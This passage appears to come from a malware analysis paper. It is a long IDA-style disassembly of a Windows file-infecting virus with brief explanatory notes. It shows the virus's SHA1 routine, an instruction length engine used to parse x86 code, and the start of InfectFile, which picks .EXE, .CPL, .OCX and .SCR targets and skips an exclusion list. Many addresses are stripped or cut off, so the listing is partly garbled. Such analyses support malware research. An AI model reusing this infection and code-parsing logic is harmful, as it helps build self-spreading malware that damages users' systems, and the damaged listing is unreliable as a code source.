CODE:00402D97 or [esp+280h+var_2e0], edx CODE:00402D9B rol eax, 1 CODE:00402D9D and [esp+280h+var_2e0], ebp CODE:00402DA1 mov [esp+280h+var_4c8], eax CODE:00402DA8 add edi, eax CODE:00402DAA mov eax, ecx CODE:00402DAC and eax, edx CODE:00402DAE or eax, [esp+280h+var_2e0] CODE:00402DB2 ror ecx, 2 CODE:00402DB5 lea edi, [edi+eax-70e44324h] CODE:00402DBC mov [esp+280h+var_2e0], edi CODE:00402DC0 mov eax, [esp+280h+var_4d0] CODE:00402DC7 rol [esp+280h+var_2e0], 5 CODE:00402DCC xor eax, [esp+280h+var_4a4] CODE:00402DD3 add ebp, [esp+280h+var_2e0] CODE:00402DD7 xor eax, [esp+280h+var_4bc] CODE:00402DDE mov [esp+280h+var_2e0], ebx CODE:00402DE2 xor eax, [esp+280h+var_4c4] CODE:00402DE9 or [esp+280h+var_2e0], ecx CODE:00402DED rol eax, 1 CODE:00402DEF and [esp+280h+var_2e0], edx CODE:00402DF3 mov [esp+280h+var_4c4], eax CODE:00402DFA add ebp, eax CODE:00402DFC mov eax, ebx CODE:00402DFE and eax, ecx CODE:00402E00 or eax, [esp+280h+var_2e0] CODE:00402E04 ror ebx, 2 CODE:00402E07 lea ebp, [ebp+eax-70e44324h] CODE:00402E0E mov [esp+280h+var_2e0], ebp

53 CODE:00402E12 mov eax, [esp+280h+var_4cc] CODE:00402E19 rol [esp+280h+var_2e0], 5 CODE:00402E1E xor eax, [esp+280h+_temp_buffer] CODE:00402E25 add edx, [esp+280h+var_2e0] CODE:00402E29 xor eax, [esp+280h+var_4b8] CODE:00402E30 mov [esp+280h+var_2e0], edi CODE:00402E34 xor eax, [esp+280h+var_4c0] CODE:00402E3B or [esp+280h+var_2e0], ebx CODE:00402E3F rol eax, 1 CODE:00402E41 and [esp+280h+var_2e0], ecx CODE:00402E45 mov [esp+280h+var_4c0], eax CODE:00402E4C add edx, eax CODE:00402E4E mov eax, edi CODE:00402E50 and eax, ebx CODE:00402E52 or eax, [esp+280h+var_2e0] CODE:00402E56 ror edi, 2 CODE:00402E59 lea edx, [edx+eax-70e44324h] CODE:00402E60 mov [esp+280h+var_2e0], edx CODE:00402E64 mov eax, [esp+280h+var_4c8] CODE:00402E6B rol [esp+280h+var_2e0], 5 CODE:00402E70 xor eax, [esp+280h+var_4dc] CODE:00402E77 add ecx, [esp+280h+var_2e0] CODE:00402E7B xor eax, [esp+280h+var_4b4] CODE:00402E82 mov [esp+280h+var_2e0], ebp CODE:00402E86 xor eax, [esp+280h+var_4bc] CODE:00402E8D or [esp+280h+var_2e0], edi CODE:00402E91 rol eax, 1 CODE:00402E93 and [esp+280h+var_2e0], ebx CODE:00402E97 mov [esp+280h+var_4bc], eax CODE:00402E9E add ecx, eax CODE:00402EA0 mov eax, ebp CODE:00402EA2 and eax, edi CODE:00402EA4 or eax, [esp+280h+var_2e0] CODE:00402EA8 ror ebp, 2 CODE:00402EAB lea ecx, [ecx+eax-70e44324h] CODE:00402EB2 mov [esp+280h+var_2e0], ecx CODE:00402EB6 mov eax, [esp+280h+var_4c4] CODE:00402EBD rol [esp+280h+var_2e0], 5 CODE:00402EC2 xor eax, [esp+280h+var_4d8] CODE:00402EC9 add ebx, [esp+280h+var_2e0] CODE:00402ECD xor eax, [esp+280h+var_4b0] CODE:00402ED4 mov [esp+280h+var_2e0], edx CODE:00402ED8 xor eax, [esp+280h+var_4b8] CODE:00402EDF or [esp+280h+var_2e0], ebp CODE:00402EE3 rol eax, 1 CODE:00402EE5 and [esp+280h+var_2e0], edi CODE:00402EE9 mov [esp+280h+var_4b8], eax CODE:00402EF0 add ebx, eax CODE:00402EF2 mov eax, edx CODE:00402EF4 and eax, ebp CODE:00402EF6 or eax, [esp+280h+var_2e0] CODE:00402EFA ror edx, 2 CODE:00402EFD lea ebx, [ebx+eax-70e44324h] CODE:00402F04 mov [esp+280h+var_2e0], ebx CODE:00402F08 mov eax, [esp+280h+var_4c0] CODE:00402F0F rol [esp+280h+var_2e0], 5 CODE:00402F14 xor eax, [esp+280h+var_4d4]

54 CODE:00402F1B add edi, [esp+280h+var_2e0] CODE:00402F1F xor eax, [esp+280h+var_4ac] CODE:00402F26 mov [esp+280h+var_2e0], ecx CODE:00402F2A xor eax, [esp+280h+var_4b4] CODE:00402F31 or [esp+280h+var_2e0], edx CODE:00402F35 rol eax, 1 CODE:00402F37 and [esp+280h+var_2e0], ebp CODE:00402F3B mov [esp+280h+var_4b4], eax CODE:00402F42 add edi, eax CODE:00402F44 mov eax, ecx CODE:00402F46 and eax, edx CODE:00402F48 or eax, [esp+280h+var_2e0] CODE:00402F4C ror ecx, 2 CODE:00402F4F lea edi, [edi+eax-70e44324h] CODE:00402F56 mov [esp+280h+var_2e0], edi CODE:00402F5A mov eax, [esp+280h+var_4bc] CODE:00402F61 rol [esp+280h+var_2e0], 5 CODE:00402F66 xor eax, [esp+280h+var_4d0] CODE:00402F6D add ebp, [esp+280h+var_2e0] CODE:00402F71 xor eax, [esp+280h+var_4a8] CODE:00402F78 mov [esp+280h+var_2e0], ebx CODE:00402F7C xor eax, [esp+280h+var_4b0] CODE:00402F83 xor [esp+280h+var_2e0], ecx CODE:00402F87 rol eax, 1 CODE:00402F89 xor [esp+280h+var_2e0], edx CODE:00402F8D mov [esp+280h+var_4b0], eax CODE:00402F94 add ebp, [esp+280h+var_2e0] CODE:00402F98 ror ebx, 2 CODE:00402F9B lea ebp, [ebp+eax-359d3e2ah] CODE:00402FA2 mov [esp+280h+var_2e0], ebp CODE:00402FA6 mov eax, [esp+280h+var_4b8] CODE:00402FAD rol [esp+280h+var_2e0], 5 CODE:00402FB2 xor eax, [esp+280h+var_4cc] CODE:00402FB9 add edx, [esp+280h+var_2e0] CODE:00402FBD xor eax, [esp+280h+var_4a4] CODE:00402FC4 mov [esp+280h+var_2e0], edi CODE:00402FC8 xor eax, [esp+280h+var_4ac] CODE:00402FCF xor [esp+280h+var_2e0], ebx CODE:00402FD3 rol eax, 1 CODE:00402FD5 xor [esp+280h+var_2e0], ecx CODE:00402FD9 mov [esp+280h+var_4ac], eax CODE:00402FE0 add edx, [esp+280h+var_2e0] CODE:00402FE4 ror edi, 2 CODE:00402FE7 lea edx, [edx+eax-359d3e2ah] CODE:00402FEE mov [esp+280h+var_2e0], edx CODE:00402FF2 mov eax, [esp+280h+var_4b4] CODE:00402FF9 rol [esp+280h+var_2e0], 5 CODE:00402FFE xor eax, [esp+280h+var_4c8] CODE: add ecx, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+_temp_buffer] CODE: mov [esp+280h+var_2e0], ebp CODE: xor eax, [esp+280h+var_4a8] CODE: B xor [esp+280h+var_2e0], edi CODE: F rol eax, 1 CODE: xor [esp+280h+var_2e0], ebx CODE: mov [esp+280h+var_4a8], eax CODE: C add ecx, [esp+280h+var_2e0]

55 CODE: ror ebp, 2 CODE: lea ecx, [ecx+eax-359d3e2ah] CODE: A mov [esp+280h+var_2e0], ecx CODE: E mov eax, [esp+280h+var_4b0] CODE: rol [esp+280h+var_2e0], 5 CODE: A xor eax, [esp+280h+var_4c4] CODE: add ebx, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+var_4dc] CODE: C mov [esp+280h+var_2e0], edx CODE: xor eax, [esp+280h+var_4a4] CODE: xor [esp+280h+var_2e0], ebp CODE: B rol eax, 1 CODE: D xor [esp+280h+var_2e0], edi CODE: mov [esp+280h+var_4a4], eax CODE: add ebx, [esp+280h+var_2e0] CODE: C ror edx, 2 CODE: F lea ebx, [ebx+eax-359d3e2ah] CODE: mov [esp+280h+var_2e0], ebx CODE: A mov eax, [esp+280h+var_4ac] CODE: rol [esp+280h+var_2e0], 5 CODE: xor eax, [esp+280h+var_4c0] CODE: D add edi, [esp+280h+var_2e0] CODE:004030A1 xor eax, [esp+280h+var_4d8] CODE:004030A8 mov [esp+280h+var_2e0], ecx CODE:004030AC xor eax, [esp+280h+_temp_buffer] CODE:004030B3 xor [esp+280h+var_2e0], edx CODE:004030B7 rol eax, 1 CODE:004030B9 xor [esp+280h+var_2e0], ebp CODE:004030BD mov [esp+280h+_temp_buffer], eax CODE:004030C4 add edi, [esp+280h+var_2e0] CODE:004030C8 ror ecx, 2 CODE:004030CB lea edi, [edi+eax-359d3e2ah] CODE:004030D2 mov [esp+280h+var_2e0], edi CODE:004030D6 mov eax, [esp+280h+var_4a8] CODE:004030DD rol [esp+280h+var_2e0], 5 CODE:004030E2 xor eax, [esp+280h+var_4bc] CODE:004030E9 add ebp, [esp+280h+var_2e0] CODE:004030ED xor eax, [esp+280h+var_4d4] CODE:004030F4 mov [esp+280h+var_2e0], ebx CODE:004030F8 xor eax, [esp+280h+var_4dc] CODE:004030FF xor [esp+280h+var_2e0], ecx CODE: rol eax, 1 CODE: xor [esp+280h+var_2e0], edx CODE: mov [esp+280h+var_4dc], eax CODE: add ebp, [esp+280h+var_2e0] CODE: ror ebx, 2 CODE: lea ebp, [ebp+eax-359d3e2ah] CODE: E mov [esp+280h+var_2e0], ebp CODE: mov eax, [esp+280h+var_4a4] CODE: rol [esp+280h+var_2e0], 5 CODE: E xor eax, [esp+280h+var_4b8] CODE: add edx, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+var_4d0] CODE: mov [esp+280h+var_2e0], edi CODE: xor eax, [esp+280h+var_4d8] CODE: B xor [esp+280h+var_2e0], ebx CODE: F rol eax, 1

56 CODE: xor [esp+280h+var_2e0], ecx CODE: mov [esp+280h+var_4d8], eax CODE: C add edx, [esp+280h+var_2e0] CODE: ror edi, 2 CODE: lea edx, [edx+eax-359d3e2ah] CODE: A mov [esp+280h+var_2e0], edx CODE: E mov eax, [esp+280h+_temp_buffer] CODE: rol [esp+280h+var_2e0], 5 CODE: A xor eax, [esp+280h+var_4b4] CODE: add ecx, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+var_4cc] CODE: C mov [esp+280h+var_2e0], ebp CODE: xor eax, [esp+280h+var_4d4] CODE: xor [esp+280h+var_2e0], edi CODE: B rol eax, 1 CODE: D xor [esp+280h+var_2e0], ebx CODE:004031A1 mov [esp+280h+var_4d4], eax CODE:004031A8 add ecx, [esp+280h+var_2e0] CODE:004031AC ror ebp, 2 CODE:004031AF lea ecx, [ecx+eax-359d3e2ah] CODE:004031B6 mov [esp+280h+var_2e0], ecx CODE:004031BA mov eax, [esp+280h+var_4dc] CODE:004031C1 rol [esp+280h+var_2e0], 5 CODE:004031C6 xor eax, [esp+280h+var_4b0] CODE:004031CD add ebx, [esp+280h+var_2e0] CODE:004031D1 xor eax, [esp+280h+var_4c8] CODE:004031D8 mov [esp+280h+var_2e0], edx CODE:004031DC xor eax, [esp+280h+var_4d0] CODE:004031E3 xor [esp+280h+var_2e0], ebp CODE:004031E7 rol eax, 1 CODE:004031E9 xor [esp+280h+var_2e0], edi CODE:004031ED mov [esp+280h+var_4d0], eax CODE:004031F4 add ebx, [esp+280h+var_2e0] CODE:004031F8 ror edx, 2 CODE:004031FB lea ebx, [ebx+eax-359d3e2ah] CODE: mov [esp+280h+var_2e0], ebx CODE: mov eax, [esp+280h+var_4d8] CODE: D rol [esp+280h+var_2e0], 5 CODE: xor eax, [esp+280h+var_4ac] CODE: add edi, [esp+280h+var_2e0] CODE: D xor eax, [esp+280h+var_4c4] CODE: mov [esp+280h+var_2e0], ecx CODE: xor eax, [esp+280h+var_4cc] CODE: F xor [esp+280h+var_2e0], edx CODE: rol eax, 1 CODE: xor [esp+280h+var_2e0], ebp CODE: mov [esp+280h+var_4cc], eax CODE: add edi, [esp+280h+var_2e0] CODE: ror ecx, 2 CODE: lea edi, [edi+eax-359d3e2ah] CODE: E mov [esp+280h+var_2e0], edi CODE: mov eax, [esp+280h+var_4d4] CODE: rol [esp+280h+var_2e0], 5 CODE: E xor eax, [esp+280h+var_4a8] CODE: add ebp, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+var_4c0] CODE: mov [esp+280h+var_2e0], ebx

57 CODE: xor eax, [esp+280h+var_4c8] CODE: B xor [esp+280h+var_2e0], ecx CODE: F rol eax, 1 CODE: xor [esp+280h+var_2e0], edx CODE: mov [esp+280h+var_4c8], eax CODE: C add ebp, [esp+280h+var_2e0] CODE: ror ebx, 2 CODE: lea ebp, [ebp+eax-359d3e2ah] CODE: A mov [esp+280h+var_2e0], ebp CODE: E mov eax, [esp+280h+var_4d0] CODE:004032A5 rol [esp+280h+var_2e0], 5 CODE:004032AA xor eax, [esp+280h+var_4a4] CODE:004032B1 add edx, [esp+280h+var_2e0] CODE:004032B5 xor eax, [esp+280h+var_4bc] CODE:004032BC mov [esp+280h+var_2e0], edi CODE:004032C0 xor eax, [esp+280h+var_4c4] CODE:004032C7 xor [esp+280h+var_2e0], ebx CODE:004032CB rol eax, 1 CODE:004032CD xor [esp+280h+var_2e0], ecx CODE:004032D1 mov [esp+280h+var_4c4], eax CODE:004032D8 add edx, [esp+280h+var_2e0] CODE:004032DC ror edi, 2 CODE:004032DF lea edx, [edx+eax-359d3e2ah] CODE:004032E6 mov [esp+280h+var_2e0], edx CODE:004032EA mov eax, [esp+280h+var_4cc] CODE:004032F1 rol [esp+280h+var_2e0], 5 CODE:004032F6 xor eax, [esp+280h+_temp_buffer] CODE:004032FD add ecx, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+var_4b8] CODE: mov [esp+280h+var_2e0], ebp CODE: C xor eax, [esp+280h+var_4c0] CODE: xor [esp+280h+var_2e0], edi CODE: rol eax, 1 CODE: xor [esp+280h+var_2e0], ebx CODE: D mov [esp+280h+var_4c0], eax CODE: add ecx, [esp+280h+var_2e0] CODE: ror ebp, 2 CODE: B lea ecx, [ecx+eax-359d3e2ah] CODE: mov [esp+280h+var_2e0], ecx CODE: mov eax, [esp+280h+var_4c8] CODE: D rol [esp+280h+var_2e0], 5 CODE: xor eax, [esp+280h+var_4dc] CODE: add ebx, [esp+280h+var_2e0] CODE: D xor eax, [esp+280h+var_4b4] CODE: mov [esp+280h+var_2e0], edx CODE: xor eax, [esp+280h+var_4bc] CODE: F xor [esp+280h+var_2e0], ebp CODE: rol eax, 1 CODE: xor [esp+280h+var_2e0], edi CODE: mov [esp+280h+var_4bc], eax CODE: add ebx, [esp+280h+var_2e0] CODE: ror edx, 2 CODE: lea ebx, [ebx+eax-359d3e2ah] CODE: E mov [esp+280h+var_2e0], ebx CODE: mov eax, [esp+280h+var_4c4] CODE: rol [esp+280h+var_2e0], 5 CODE: E xor eax, [esp+280h+var_4d8]

58 CODE: add edi, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+var_4b0] CODE:004033A0 mov [esp+280h+var_2e0], ecx CODE:004033A4 xor eax, [esp+280h+var_4b8] CODE:004033AB xor [esp+280h+var_2e0], edx CODE:004033AF rol eax, 1 CODE:004033B1 xor [esp+280h+var_2e0], ebp CODE:004033B5 mov [esp+280h+var_4b8], eax CODE:004033BC add edi, [esp+280h+var_2e0] CODE:004033C0 ror ecx, 2 CODE:004033C3 lea edi, [edi+eax-359d3e2ah] CODE:004033CA mov [esp+280h+var_2e0], edi CODE:004033CE mov eax, [esp+280h+var_4c0] CODE:004033D5 rol [esp+280h+var_2e0], 5 CODE:004033DA xor eax, [esp+280h+var_4d4] CODE:004033E1 add ebp, [esp+280h+var_2e0] CODE:004033E5 xor eax, [esp+280h+var_4ac] CODE:004033EC mov [esp+280h+var_2e0], ebx CODE:004033F0 xor eax, [esp+280h+var_4b4] CODE:004033F7 xor [esp+280h+var_2e0], ecx CODE:004033FB rol eax, 1 CODE:004033FD xor [esp+280h+var_2e0], edx CODE: mov [esp+280h+var_4b4], eax CODE: add ebp, [esp+280h+var_2e0] CODE: C ror ebx, 2 CODE: F lea ebp, [ebp+eax-359d3e2ah] CODE: mov [esp+280h+var_2e0], ebp CODE: A mov eax, [esp+280h+var_4bc] CODE: rol [esp+280h+var_2e0], 5 CODE: xor eax, [esp+280h+var_4d0] CODE: D add edx, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+var_4a8] CODE: mov [esp+280h+var_2e0], edi CODE: C xor eax, [esp+280h+var_4b0] CODE: xor [esp+280h+var_2e0], ebx CODE: rol eax, 1 CODE: xor [esp+280h+var_2e0], ecx CODE: D mov [esp+280h+var_4b0], eax CODE: add edx, [esp+280h+var_2e0] CODE: ror edi, 2 CODE: B lea edx, [edx+eax-359d3e2ah] CODE: mov [esp+280h+var_2e0], edx CODE: mov eax, [esp+280h+var_4b8] CODE: D rol [esp+280h+var_2e0], 5 CODE: xor eax, [esp+280h+var_4cc] CODE: add ecx, [esp+280h+var_2e0] CODE: D xor eax, [esp+280h+var_4a4] CODE: mov [esp+280h+var_2e0], ebp CODE: xor eax, [esp+280h+var_4ac] CODE: F xor [esp+280h+var_2e0], edi CODE: rol eax, 1 CODE: xor [esp+280h+var_2e0], ebx CODE: mov [esp+280h+var_4ac], eax CODE:004034A0 add ecx, [esp+280h+var_2e0] CODE:004034A4 ror ebp, 2 CODE:004034A7 lea ecx, [ecx+eax-359d3e2ah] CODE:004034AE mov [esp+280h+var_2e0], ecx

59 CODE:004034B2 mov eax, [esp+280h+var_4b4] CODE:004034B9 rol [esp+280h+var_2e0], 5 CODE:004034BE xor eax, [esp+280h+var_4c8] CODE:004034C5 add ebx, [esp+280h+var_2e0] CODE:004034C9 xor eax, [esp+280h+_temp_buffer] CODE:004034D0 mov [esp+280h+var_2e0], edx CODE:004034D4 xor eax, [esp+280h+var_4a8] CODE:004034DB xor [esp+280h+var_2e0], ebp CODE:004034DF rol eax, 1 CODE:004034E1 xor [esp+280h+var_2e0], edi CODE:004034E5 mov [esp+280h+var_4a8], eax CODE:004034EC add ebx, [esp+280h+var_2e0] CODE:004034F0 ror edx, 2 CODE:004034F3 lea ebx, [ebx+eax-359d3e2ah] CODE:004034FA mov [esp+280h+var_2e0], ebx CODE:004034FE mov eax, [esp+280h+var_4b0] CODE: rol [esp+280h+var_2e0], 5 CODE: A xor eax, [esp+280h+var_4c4] CODE: add edi, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+var_4dc] CODE: C mov [esp+280h+var_2e0], ecx CODE: xor eax, [esp+280h+var_4a4] CODE: xor [esp+280h+var_2e0], edx CODE: B rol eax, 1 CODE: D xor [esp+280h+var_2e0], ebp CODE: mov [esp+280h+var_4a4], eax CODE: add edi, [esp+280h+var_2e0] CODE: C ror ecx, 2 CODE: F lea edi, [edi+eax-359d3e2ah] CODE: add [esp+280h+var_2dc], edi CODE: A add [esp+280h+var_2d8], ebx CODE: E add [esp+280h+var_2d4], ecx CODE: add [esp+280h+var_2d0], edx CODE: add [esp+280h+var_2cc], ebp CODE: A sub [esp+280h+_count], 40h CODE: F jmp SHA1_Loop CODE: F CODE: CODE: CODE: SHA1_LIPOF: CODE: cmp [esp+280h+_flag], 0 CODE: jz short SHA1_Finishing CODE: CODE: B push 40h CODE: D pop edx CODE: E mov ecx, [esp+280h+_count] CODE: mov [esp+280h+_count], edx CODE: mov eax, ecx CODE: lea edi, [esp+280h+_temp_buffer] CODE: F test eax, eax CODE: jz short only_null CODE: CODE: rep movsb CODE: CODE: CODE: only_null: CODE: mov ecx, eax

60 CODE: mov al, 80h CODE: stosb CODE: A sub ecx, 37h CODE: D neg ecx CODE: F jz short save_size_in_pad CODE: F CODE: jns short zero_mem CODE: CODE: add [esp+280h+_count], edx CODE: add ecx, edx CODE: CODE: CODE: zero_mem: CODE: xor al, al CODE: B rep stosb CODE: B CODE: D CODE: D save_size_in_pad: CODE: D xor edx, edx CODE: F mov eax, [esp+280h+_size] CODE:004035A3 push 8 CODE:004035A5 pop esi CODE:004035A6 mul esi CODE:004035A8 bswap eax CODE:004035AA bswap edx CODE:004035AC mov [edi], edx CODE:004035AE mov [edi+4], eax CODE:004035B1 lea esi, [esp+280h+_temp_buffer] CODE:004035B8 mov [esp+280h+_flag], 0 CODE:004035C0 jmp SHA1_Loop CODE:004035C0 CODE:004035C5 CODE:004035C5 CODE:004035C5 SHA1_Finishing: CODE:004035C5 mov edi, [esp+280h+arg_0] CODE:004035CC lea esi, [esp+280h+var_2dc] CODE:004035D0 push 5 CODE:004035D2 pop ecx CODE:004035D2 CODE:004035D3 CODE:004035D3 SHA1_CopyResult: CODE:004035D3 mov eax, [esi+ecx*4-4] CODE:004035D7 bswap eax CODE:004035D9 mov [edi+ecx*4-4], eax CODE:004035DD dec ecx CODE:004035DE jnz short SHA1_CopyResult CODE:004035DE CODE:004035E0 push 38h CODE:004035E2 pop ecx CODE:004035E3 xor eax, eax CODE:004035E5 lea edi, [esp+280h+_temp_buffer] CODE:004035EC rep stosd CODE:004035EE add esp, 260h CODE:004035F4 popa CODE:004035F5 retn 0Ch CODE:004035F5 CODE:004035F5 SHA1 endp

61 The previous code block hashes some data for the virus. The function requires 3 paramaeters, the address of data to be hashed, the number of bytes of data to be hashed and a pointer to the buffer to receive the message digest (20 bytes). CODE:004035F8 ILE proc near CODE:004035F8 CODE:004035F8 push esi CODE:004035F9 push edi CODE:004035FA cld CODE:004035FB call GetPrefixes CODE:004035FB CODE: call FindOpcode CODE: CODE: jb CODE: CODE: push ebx CODE: xchg esi, edi CODE: A movzx ecx, bl CODE: D and cl, 3 CODE: add esi, ecx CODE: cmp cl, 1 CODE: jnz CODE: CODE: cmp al, 0F6h CODE: jz CODE: CODE: B cmp al, 0F7h CODE: D jnz CODE: D CODE: F CODE: F push ecx CODE: mov cl, [esi] CODE: and cl, 38h CODE: pop ecx CODE: jnz CODE: CODE: or bl, 24h CODE: B and bl, 3Fh CODE: E cmp al, 0F6h CODE: jz CODE: CODE: or bl, 94h CODE: and bl, 0DFh CODE: CODE: CODE: CODE: test bl, 4 CODE: B jz CODE: B CODE: D push eax CODE: E call DecodeModRM

62 CODE: E CODE: pop eax CODE: CODE: CODE: CODE: test bh, 2 CODE: jz CODE: CODE: test bl, 10h CODE: C jz CODE: C CODE: E shr bl, 5 CODE: add cl, bl CODE: sub cl, 2 CODE: add ecx, edx CODE: pop ebx CODE: jmp CODE: CODE: B CODE: B CODE: B CODE: B shr bl, 5 CODE: E add cl, bl CODE: add ecx, edx CODE: pop ebx CODE: CODE: CODE: CODE: pop edi CODE: pop esi CODE: retn CODE: CODE: ILE endp The previous code block is the main function for the Intstruction Length Rngine (ILE). The function expects a pointer to the instruction in the ESI register. CODE: GetPrefixes proc near CODE: xor ebx, ebx CODE: xor edx, edx CODE: A lea edi, PrefixBuffer CODE: xchg esi, edi CODE: push 0Bh CODE: pop ecx CODE: CODE: CODE: lodsb CODE: cmp [edi], al CODE: jnz CODE: CODE: A push 0Ch CODE: C pop ecx

63 CODE: D inc edx CODE: E inc edi CODE: F lea esi, PrefixBuffer CODE: cmp al, 67h CODE: jnz short CODE: CODE: or bh, 1 CODE: CODE: C CODE: C cmp al, 66h CODE: E jnz CODE: E CODE: or bh, 2 CODE: CODE: CODE: cmp al, 64h CODE: jnz CODE: CODE: or bh, 4 CODE: CODE: A CODE: A CODE: A CODE: A CODE: C retn CODE: C CODE: C GetPrefixes endp The previous code block counts the prefixes and moves the register ESI. The function expects a pointer to the instruction in the ESI register. CODE: D FindOpcode proc near CODE: D CODE: D var_1 = byte ptr -1 CODE: D CODE: D push ebx CODE: E push edx CODE: F lea esi, OpcodeTable CODE: F CODE:004036A5 CODE:004036A5 CODE:004036A5 lodsw CODE:004036A7 movzx ecx, al CODE:004036AA mov bl, ah CODE:004036AC stc CODE:004036AD jecxz CODE:004036AD CODE:004036AF movzx edx, bl CODE:004036B2 and dl, 3 CODE:004036B5 dec edx CODE:004036B6 jz

64 CODE:004036B6 CODE:004036B8 dec edx CODE:004036B9 jz short CODE:004036B9 CODE:004036BB mov edx, [edi] CODE:004036BD shl edx, 8 CODE:004036BD CODE:004036C0 CODE:004036C0 lodsd CODE:004036C1 dec esi CODE:004036C2 shl eax, 8 CODE:004036C5 cmp eax, edx CODE:004036C7 jz CODE:004036C7 CODE:004036C9 CODE:004036C9 CODE:004036CB jmp CODE:004036CB CODE:004036CD CODE:004036CD CODE:004036CD movzx edx, word ptr [edi] CODE:004036D0 test bl, 1000b CODE:004036D3 jz CODE:004036D3 CODE:004036D5 and dh, b CODE:004036D5 CODE:004036D8 CODE:004036D8 CODE:004036D8 lodsw CODE:004036DA cmp ax, dx CODE:004036DD jz CODE:004036DD CODE:004036DF CODE:004036DF CODE:004036E1 jmp CODE:004036E1 CODE:004036E3 CODE:004036E3 CODE:004036E3 mov dl, [edi] CODE:004036E5 test bl, 8 CODE:004036E8 jz CODE:004036E8 CODE:004036EA and dl, 0F8h CODE:004036EA CODE:004036ED CODE:004036ED CODE:004036ED lodsb CODE:004036EE cmp al, dl CODE:004036F0 jz CODE:004036F0 CODE:004036F2 CODE:004036F2

65 CODE:004036F4 jmp short CODE:004036F4 CODE:004036F6 CODE:004036F6 CODE:004036F6 CODE:004036F6 CODE:004036F6 clc CODE:004036F6 CODE:004036F7 CODE:004036F7 CODE:004036F7 mov [esp+5+var_1], bl CODE:004036FB pop edx CODE:004036FC pop ebx CODE:004036FD retn CODE:004036FD CODE:004036FD FindOpcode endp The previous code block finds an opcode in tables. The pointer expects a pointed to the opcode in EDI register. CODE:004036FE DecodeModRM proc near CODE:004036FE test bh, 1 CODE: jnz CODE: CODE: inc ecx CODE: lodsb CODE: mov ah, al CODE: and ah, 0C0h CODE: A jz CODE: A CODE: C cmp ah, 0C0h CODE: F jz CODE: F CODE: inc ecx CODE: cmp ah, 40h CODE: jz CODE: CODE: test bh, 1 CODE: A jnz CODE: A CODE: C inc ecx CODE: D inc ecx CODE: D CODE: E CODE: E inc ecx CODE: E CODE: F CODE: F CODE: F mov ah, al CODE: and ah, b CODE: cmp ah, 101b CODE: jnz CODE:

66 CODE: add ecx, 4 CODE: CODE: C CODE: C mov ah, al CODE: E and ah, 7 CODE: cmp ah, 4 CODE: jnz CODE: CODE: inc ecx CODE: mov ah, al CODE: lodsb CODE: A and ax, b CODE: E cmp ax, b CODE: jz CODE: CODE: cmp al, 101b CODE: jnz CODE: CODE: add ecx, 11b CODE: CODE: B CODE: B inc ecx CODE: B CODE: C CODE: C CODE: C retn CODE: C CODE: D CODE: D CODE: D inc ecx CODE: E lodsb CODE: F mov ah, al CODE: and ah, 0C0h CODE: jz CODE: CODE: cmp ah, 0C0h CODE: jz CODE: CODE: B cmp ah, 40h CODE: E jz CODE: E CODE: CODE: inc ecx CODE: CODE: CODE: inc ecx CODE: CODE: CODE: retn CODE:

67 CODE: CODE: CODE: CODE: and al, 7 CODE: cmp al, 6 CODE: jz CODE: CODE: retn CODE: CODE: DecodeModRM endp The previous code decodes ModR/M and ModR/M16 byte. The function expects pointer to ModRM byte in ESI register and the instruction length in the ECX register. CODE: A InfectFile proc near CODE: A CODE: A CODE: A CODE: A var_46c = dword ptr -46Ch CODE: A CODE: A CODE: A pusha CODE: A CODE: B CODE: B cmp InfectState, 0 CODE: jnz CODE: CODE: or InfectState, 0FFFFFFFFh CODE: B lea ebx, sub_403ccc CODE: mov [ebp+0f4h], ebx CODE: lea CODE: D mov [ebp+0f8h], ebx CODE: mov [ebp+0fch], esp CODE: lea ebx, [ebp+0f0h] CODE: F push ebx CODE:004037A0 xor ebx, ebx CODE:004037A2 push dword ptr fs:[ebx] CODE:004037A5 pop dword ptr [ebp+0f0h] CODE:004037AB pop dword ptr fs:[ebx] CODE:004037AE lea esi, [ebp+168h] CODE:004037B4 call Uppercase CODE:004037B4 CODE:004037B9 mov edi, esi CODE:004037BB mov ebx, esi CODE:004037BB CODE:004037BD CODE:004037BD CODE:004037BD lodsb CODE:004037BE test al, al CODE:004037C0 jz CODE:004037C0 CODE:004037C2 cmp al, '\' CODE:004037C4 jnz

68 CODE:004037C4 CODE:004037C6 mov ebx, esi CODE:004037C8 jmp short CODE:004037C8 CODE:004037CA CODE:004037CA CODE:004037CA CODE:004037CA xchg esi, edi CODE:004037CC cmp dword ptr [edi-5], 'EXE.' CODE:004037D3 jz short CODE:004037D3 CODE:004037D5 cmp dword ptr [edi-5], 'LPC.' CODE:004037DC jz short CODE:004037DC CODE:004037DE cmp dword ptr [edi-5], 'CXO.' CODE:004037E5 jz short CODE:004037E5 CODE:004037E7 cmp dword ptr [edi-5], 'RCS.' CODE:004037EE jnz CODE:004037EE CODE:004037F4 CODE:004037F4 CODE:004037F4 CODE:004037F4 lea edi, Shit_List_Table CODE:004037FA xchg edi, esi CODE:004037FA CODE:004037FC CODE:004037FC CODE:004037FC lodsw CODE:004037FE cmp [ebx], ax CODE: jz CODE: CODE: test ax, ax CODE: A jnz short CODE: A CODE: C cmp dword ptr [ebx], 'TAOG' CODE: jnz CODE: CODE: mov ecx, [ebp+15ch] CODE: E cmp ecx, 8000h CODE: jnb short CODE: CODE: mov eax, 0Ah CODE: B call RandomNumber CODE: B CODE: test eax, eax CODE: jnz CODE: CODE: CODE: CODE: cmp ecx, h CODE: E jbe short CODE: E CODE: mov eax, 20h CODE: call RandomNumber CODE: CODE: A test eax, eax

